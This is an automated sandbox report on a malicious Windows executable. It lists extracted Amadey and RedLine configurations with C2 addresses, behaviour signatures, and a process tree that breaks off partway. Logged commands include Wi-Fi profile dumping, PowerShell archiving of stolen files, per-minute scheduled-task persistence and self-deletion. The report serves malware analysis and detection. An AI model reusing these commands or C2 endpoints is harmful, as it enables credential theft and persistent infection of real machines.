Resubmissions

29-03-2024 14:25

240329-rrdgpsad9y

Analysis

  • max time kernel
    185s
  • max time network
    246s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240319-en
  • resource tags

    arch:x64arch:x86image:win11-20240319-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    29-03-2024 17:48

General

  • Target

    7ef012907eb337ad94d0635a9d1a1dd64ccb32b5c193a5bb732eee3dd22013da.exe

  • Size

    1.9MB

  • MD5

    864674e8be395eb28bb181184add5c01

  • SHA1

    79bb9c0ae54bf8572328af06b6576327bd0a386c

  • SHA256

    7ef012907eb337ad94d0635a9d1a1dd64ccb32b5c193a5bb732eee3dd22013da

  • SHA512

    7f85146e5cca26f5a388aeea88cf9d86819aed6e240c3b94569967a2074654327e531be66f1335f9fa0790f13844c65315a3020d0e9c6bdce40c3605164abc25

  • SSDEEP

    49152:EJ8NNvupgJi+RYYhQx/QAfi4oxa03C+v7sOh9yPQtE:Xvu+RIx/QAfiTY03C+z/yP

Malware Config

Extracted

Family

amadey

Version

4.17

C2

http://185.215.113.32

Attributes
  • install_dir

    00c07260dc

  • install_file

    explorgu.exe

  • strings_key

    461809bd97c251ba0c0c8450c7055f1d

  • url_paths

    /yandex/index.php

rc4.plain

Extracted

Family

redline

Botnet

@OLEH_PSP

C2

185.172.128.33:8970

Extracted

Family

amadey

Version

4.18

C2

http://193.233.132.56

Attributes
  • install_dir

    09fd851a4f

  • install_file

    explorha.exe

  • strings_key

    443351145ece4966ded809641c77cfa8

  • url_paths

    /Pneh2sXQk0/index.php

rc4.plain

Extracted

Family

redline

Botnet

Jok123

C2

185.215.113.67:26260

Extracted

Family

redline

Botnet

LiveTraffic

C2

4.185.137.132:1632

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detect ZGRat V1 13 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 8 IoCs
  • RisePro

    RisePro stealer is an infostealer distributed by PrivateLoader.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 10 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 20 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 24 IoCs
  • Identifies Wine through registry keys 2 TTPs 10 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 7 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 41 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 25 IoCs
  • Suspicious use of FindShellTrayWindow 46 IoCs
  • Suspicious use of SendNotifyMessage 31 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:648
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:552
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{d72e9f46-25f1-46f2-816d-0c3624b0d834}
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:6856
    • C:\Windows\system32\lsass.exe
      C:\Windows\system32\lsass.exe
      1⤵
        PID:700
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
        1⤵
          PID:1000
        • C:\Windows\System32\svchost.exe
          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
          1⤵
            PID:488
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
            1⤵
              PID:448
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
              1⤵
                PID:1068
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                1⤵
                  PID:1156
                  • C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
                    C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
                    2⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Adds Run key to start application
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of WriteProcessMemory
                    PID:1860
                    • C:\Users\Admin\AppData\Local\Temp\1000873001\random.exe
                      "C:\Users\Admin\AppData\Local\Temp\1000873001\random.exe"
                      3⤵
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      PID:1060
                    • C:\Users\Admin\AppData\Local\Temp\1000985001\alex1234.exe
                      "C:\Users\Admin\AppData\Local\Temp\1000985001\alex1234.exe"
                      3⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • Suspicious use of WriteProcessMemory
                      PID:3552
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        4⤵
                          PID:3240
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                          4⤵
                            PID:1400
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            4⤵
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:4548
                            • C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe
                              "C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe"
                              5⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:240
                            • C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe
                              "C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe"
                              5⤵
                              • Executes dropped EXE
                              • Modifies system certificate store
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4432
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
                              5⤵
                                PID:1988
                                • C:\Windows\SysWOW64\choice.exe
                                  choice /C Y /N /D Y /T 3
                                  6⤵
                                    PID:4712
                            • C:\Users\Admin\AppData\Local\Temp\1001031001\amadka.exe
                              "C:\Users\Admin\AppData\Local\Temp\1001031001\amadka.exe"
                              3⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • Drops file in Windows directory
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of FindShellTrayWindow
                              • Suspicious use of WriteProcessMemory
                              PID:2952
                              • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                "C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"
                                4⤵
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Adds Run key to start application
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • Suspicious use of SetThreadContext
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of WriteProcessMemory
                                PID:5020
                                • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                  "C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"
                                  5⤵
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  PID:1032
                                • C:\Users\Admin\AppData\Local\Temp\1000042001\6d377b3bec.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1000042001\6d377b3bec.exe"
                                  5⤵
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  PID:4616
                                • C:\Users\Admin\AppData\Local\Temp\1000044001\go.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1000044001\go.exe"
                                  5⤵
                                  • Executes dropped EXE
                                  • Suspicious use of FindShellTrayWindow
                                  • Suspicious use of SendNotifyMessage
                                  PID:5220
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/account
                                    6⤵
                                    • Enumerates system info in registry
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                    • Suspicious use of FindShellTrayWindow
                                    • Suspicious use of SendNotifyMessage
                                    PID:5984
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8d7973cb8,0x7ff8d7973cc8,0x7ff8d7973cd8
                                      7⤵
                                        PID:5428
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1896,17091035128438588573,5733087388821926471,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1908 /prefetch:2
                                        7⤵
                                          PID:2640
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1896,17091035128438588573,5733087388821926471,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2384 /prefetch:3
                                          7⤵
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:5404
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1896,17091035128438588573,5733087388821926471,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2768 /prefetch:8
                                          7⤵
                                            PID:5740
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,17091035128438588573,5733087388821926471,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1
                                            7⤵
                                              PID:4648
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,17091035128438588573,5733087388821926471,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1
                                              7⤵
                                                PID:5584
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,17091035128438588573,5733087388821926471,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4420 /prefetch:1
                                                7⤵
                                                  PID:5700
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,17091035128438588573,5733087388821926471,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4784 /prefetch:1
                                                  7⤵
                                                    PID:6420
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,17091035128438588573,5733087388821926471,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4432 /prefetch:1
                                                    7⤵
                                                      PID:6460
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,17091035128438588573,5733087388821926471,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4776 /prefetch:1
                                                      7⤵
                                                        PID:6468
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1896,17091035128438588573,5733087388821926471,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5672 /prefetch:8
                                                        7⤵
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:6404
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/video
                                                      6⤵
                                                        PID:5792
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8d7973cb8,0x7ff8d7973cc8,0x7ff8d7973cd8
                                                          7⤵
                                                            PID:5812
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1872,15579106055742983322,3767975018625868539,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1880 /prefetch:2
                                                            7⤵
                                                              PID:5712
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1872,15579106055742983322,3767975018625868539,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:3
                                                              7⤵
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:1592
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
                                                            6⤵
                                                              PID:1792
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8d7973cb8,0x7ff8d7973cc8,0x7ff8d7973cd8
                                                                7⤵
                                                                  PID:4476
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1984,9443656150339865460,13429635712558271805,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1992 /prefetch:3
                                                                  7⤵
                                                                    PID:6264
                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
                                                                5⤵
                                                                • Loads dropped DLL
                                                                PID:5892
                                                                • C:\Windows\system32\rundll32.exe
                                                                  "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
                                                                  6⤵
                                                                  • Blocklisted process makes network request
                                                                  • Loads dropped DLL
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:6024
                                                                  • C:\Windows\system32\netsh.exe
                                                                    netsh wlan show profiles
                                                                    7⤵
                                                                      PID:5304
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\233663403127_Desktop.zip' -CompressionLevel Optimal
                                                                      7⤵
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:6304
                                                                • C:\Users\Admin\AppData\Local\Temp\1000046001\amert.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\1000046001\amert.exe"
                                                                  5⤵
                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                  • Checks BIOS information in registry
                                                                  • Executes dropped EXE
                                                                  • Identifies Wine through registry keys
                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:6040
                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                  "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
                                                                  5⤵
                                                                  • Blocklisted process makes network request
                                                                  • Loads dropped DLL
                                                                  PID:6164
                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                              "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
                                                              3⤵
                                                              • Loads dropped DLL
                                                              • Suspicious use of WriteProcessMemory
                                                              PID:3448
                                                              • C:\Windows\system32\rundll32.exe
                                                                "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
                                                                4⤵
                                                                • Blocklisted process makes network request
                                                                • Loads dropped DLL
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of WriteProcessMemory
                                                                PID:4280
                                                                • C:\Windows\system32\netsh.exe
                                                                  netsh wlan show profiles
                                                                  5⤵
                                                                    PID:1604
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\233663403127_Desktop.zip' -CompressionLevel Optimal
                                                                    5⤵
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:1180
                                                              • C:\Users\Admin\AppData\Local\Temp\1001039001\redlinepanel.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\1001039001\redlinepanel.exe"
                                                                3⤵
                                                                • Executes dropped EXE
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:1320
                                                              • C:\Users\Admin\AppData\Local\Temp\1001040001\32456.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\1001040001\32456.exe"
                                                                3⤵
                                                                • Executes dropped EXE
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:3552
                                                              • C:\Users\Admin\AppData\Local\Temp\1001053001\goldprimeldlldf.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\1001053001\goldprimeldlldf.exe"
                                                                3⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of SetThreadContext
                                                                • Suspicious use of WriteProcessMemory
                                                                PID:1448
                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                  4⤵
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:4560
                                                              • C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe"
                                                                3⤵
                                                                • Executes dropped EXE
                                                                PID:5084
                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                  "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe" /F
                                                                  4⤵
                                                                  • Creates scheduled task(s)
                                                                  PID:3696
                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
                                                                3⤵
                                                                • Blocklisted process makes network request
                                                                • Loads dropped DLL
                                                                PID:2700
                                                              • C:\Users\Admin\AppData\Local\Temp\1001061001\Second2.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\1001061001\Second2.exe"
                                                                3⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                • Suspicious use of SetThreadContext
                                                                PID:5452
                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
                                                                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
                                                                  4⤵
                                                                    PID:6928
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 6928 -s 2072
                                                                      5⤵
                                                                      • Program crash
                                                                      PID:6680
                                                                • C:\Users\Admin\AppData\Local\Temp\1001063001\Tcgprylsch.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\1001063001\Tcgprylsch.exe"
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  • Adds Run key to start application
                                                                  • Suspicious use of SetThreadContext
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:6032
                                                                  • C:\Users\Admin\AppData\Local\Temp\$77a962c1
                                                                    "C:\Users\Admin\AppData\Local\Temp\$77a962c1"
                                                                    4⤵
                                                                    • Executes dropped EXE
                                                                    PID:6956
                                                                  • C:\Users\Admin\AppData\Local\Temp\$775cc22a
                                                                    "C:\Users\Admin\AppData\Local\Temp\$775cc22a"
                                                                    4⤵
                                                                    • Executes dropped EXE
                                                                    • Adds Run key to start application
                                                                    PID:6104
                                                                • C:\Users\Admin\AppData\Local\Temp\1001065001\koooooo.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\1001065001\koooooo.exe"
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of SetThreadContext
                                                                  PID:4052
                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                    4⤵
                                                                      PID:5220
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4052 -s 868
                                                                      4⤵
                                                                      • Program crash
                                                                      PID:6184
                                                                • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                  2⤵
                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                  • Checks BIOS information in registry
                                                                  • Executes dropped EXE
                                                                  • Identifies Wine through registry keys
                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                  PID:6348
                                                                • C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
                                                                  2⤵
                                                                  • Executes dropped EXE
                                                                  PID:816
                                                                • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                  2⤵
                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                  • Checks BIOS information in registry
                                                                  • Executes dropped EXE
                                                                  • Identifies Wine through registry keys
                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                  PID:6180
                                                                • C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
                                                                  2⤵
                                                                  • Executes dropped EXE
                                                                  PID:4816
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
